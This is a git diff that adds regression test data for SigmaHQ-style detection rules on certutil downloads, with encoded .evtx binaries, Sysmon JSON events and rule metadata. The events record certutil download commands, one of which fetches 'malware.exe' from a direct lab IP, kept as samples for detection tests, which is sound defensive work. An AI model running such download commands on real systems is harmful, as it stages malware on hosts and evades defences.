zP%GXCutXCm@93&g?2!Hb1aw8`_`~kyZ-RDoL*EYN)yfZ_C)I{V(Z^JdoJOUTsAHAG z6ZLZ(HK?50ov-t%?{^?_c; zjtCp96X@T(#9kL+0TK1jH9bU$4c5tb)YRGVYCS6VhwBxBTk_j#^O4{jm35#J5SVnp zRF4n#XAaw>!l_0j&{;89=NJ$V+Q(it z(Z$6&iRX>y+3JNB+QsJP5Xz}iF!DBNP32(Z23>UD{iPW4Y0$-4)NbYP;Px({eC)<; z&Wf{&23;(^!}v`W#%0jOmE>g5#d(a5`HA3gdn=MQ?~Cn~zuJiAa~7mfEKTz4&GlE7 zDHM(#obyx%<-GX*f;p;5jE5#skG#f2rP5)Kt!9$Tms0sLic979I+a^m7A+`!RJ6zU z5!oKoQ)~hLN9tJw8nIgG`@j};>tx_r$zb3YfT=Z7{e7IA!eNkVgH#)&y6&}F2V5lm zSVJNde6%|R3FUhT%15;#ROM?Dn^CtO8Lfd;p9S_bi!W<3H|lNz4&qx{+K-D}vmxn> zGXvMqqtfAx9e}^uca_AeTHwt?kJJ`9yVZ(&i}=!y?S8Zlq{_Fwwt_D4EPA@pIj#*P zo@@=F9i6~k`djjCu*Y%t3LL@7!QjR4%9ZOA;UJ16<>$ny8^8DTD|ueIFPwWuKB%r- zuiQ@$EGFv5cHQgy#N#iXJNUH?pARm3<$e~YmF<YzuXJ)3M?-0SgV;zOO7@E%mKr;=TvBYg zxfot)o}$@UrXM@k6Vij4`zWdQe-Kv>;FyMd*$08cE{A;ielAD742nG{b2S=WK4FWIu(wPa%*xTa+M2v z5>;!Q`1Ui1Z_f+w*jM*(WEQ~)EVugCNk?%pk37?3JI8^S6t1&oi0o;*?Rvfv1+7CX zdHR=cakBJJ-f<@T))zRu6+-{|alS{EX%wY9S7v_zq}j48H80 zIEc)4;5UY_T;sssB+5OFa!=q$B0T3wx}`6DLWbS}pZzo_^&n;k=#okXcSwoh;_^Oy zU8$*YNj-z}1g<(D-7ciW_))RL;*y+of?f=<(+H75+-^K)j82(C9RKNS--c&>2$Mlb zb*?#NoCLx!&!o<^l%&CMAKSEsa*s2L4S{-UzrDI z8n58W16A)vq<*XCIXpwx?2CnUXk%mUJzyL7lgDc~IgP_$9R}+#Sckzn&UXd!X$RKv z57FQGi+rr(_J1>2hi?s6AScnH+wDYyb(ACzgLS|paItvnF`6R!Vz3VTE&?^MD>YtX zuns3u(u^^>!8-D>!L`OZdVx_8>$nAn#yU3RyaUHp95>>~$2x!y+OQ7pn@+rg;Yz_e zX#Wv=pzTI$_cXAMyDh9^)5g+mD9+<>r}Hf86L(fQ2C95J{RHf$)k8b>Skxm0(^wH8 zEJPg&k&Fn&!HTa1*qenrq^vda;Vl#IClRcH??-FB7m_FN!uoKh5Zz$v8VQ*?*WHp9`HLY;6!iM=B^}lSrpjCp+2Fcn zVh)|S!#ogsA*K_x&e}kURGCB4jpKO=XT(dK=td0Bh~O}9TrWzR8JQPyK!igfC`2}x zzQT@ppB^4+r;CrHw73-x(T&$JUFWV3`DLf}X;=VuF}7SUb**%dy^x3S6^k7~+j2j& zY!;fii2BYH7I57HbcFwTen6(mm5h3yo>KHuW)QLM{z5+MS{okX=Xtoti#UJQ;2!49 zTIS7K=FM6cu=Cop4%}l`&;R!2;~syu%itac_gLO>j%&<}kH;ub1@=AFK6-~49}kGa zj#U{Sk3xxftlu?09_8)En2*i;rucZ!PebD#JRiY9Ok^b=k4}UkW>Sie2R%J#x6ucK zmLF~5C~%M4EZpPQ%RBYiXNKKY6mi}4JZvDkyVA=-+gI+W2klN;l;!z&q^vZ!Uuk|C L7a!4Z;pG1SB-pzk literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json b/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json new file mode 100644 index 000000000..27dce7a6b --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:02:36.900637Z" + } + }, + "EventRecordID": 11537869, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:02:36.894", + "ProcessGuid": "5AA13A44-02AC-68FD-7A35-000000004002", + "ProcessId": 6484, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil.exe -urlcache -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1001.002/T1001.002.yaml atomic.yaml", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_download/info.yml new file mode 100644 index 000000000..c9bf97f46 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download/info.yml @@ -0,0 +1,13 @@ +id: ee435dcb-08cb-4de1-bb70-bdd27cf0dae9 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b + title: Suspicious Download Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx new file mode 100644 index 0000000000000000000000000000000000000000..73837d70cead0db7e76f7fd44a9584cd14854af1 GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.json b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.json new file mode 100644 index 000000000..5de823e73 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:01:06.116464Z" + } + }, + "EventRecordID": 11507958, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:01:06.109", + "ProcessGuid": "5AA13A44-0252-68FD-7235-000000004002", + "ProcessId": 6432, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil.exe -urlcache -f http://10.0.1.14/malware.exe malware-ctl.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml new file mode 100644 index 000000000..77577cd85 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml @@ -0,0 +1,13 @@ +id: 76e024fd-9064-46ae-85f8-c524dc6b3492 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 + title: Suspicious File Downloaded From Direct IP Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx new file mode 100644 index 0000000000000000000000000000000000000000..bfc51182e6d657c863f25b0579847d7f35f18058 GIT binary patch literal 69632 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 